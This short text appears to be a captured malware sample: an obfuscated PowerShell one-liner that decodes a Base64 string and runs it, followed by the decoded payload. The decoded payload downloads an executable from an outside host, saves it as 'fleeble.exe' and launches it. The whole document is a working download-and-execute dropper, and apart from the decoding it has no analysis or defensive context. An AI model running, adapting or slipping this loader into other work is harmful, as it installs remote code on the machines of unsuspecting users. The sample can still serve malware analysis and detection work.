iex([SysTEM.TeXt.enCODInG]::utF8.geTSTRiNG([SYstem.CONVErT]::fROmbAsE64STriNg('CihOZXctT2JqZWN0IFN5U1RFbS5OZXQuV0ViQ0xJRU5UKS5kb1dOTE9hRGZpbEUoJ2h0dHA6Ly9tYXRrYWx2LjVnYmZyZWUuY29tL2NhbGFiL2NhbGFmaWxlLmV4ZScsJ2ZsZWVibGUuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWJsZS5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object SySTEm.Net.WEbCLIENT).doWNLOaDfilE('http://matkalv.5gbfree.com/calab/calafile.exe','fleeble.exe');Start-Process 'fleeble.exe'

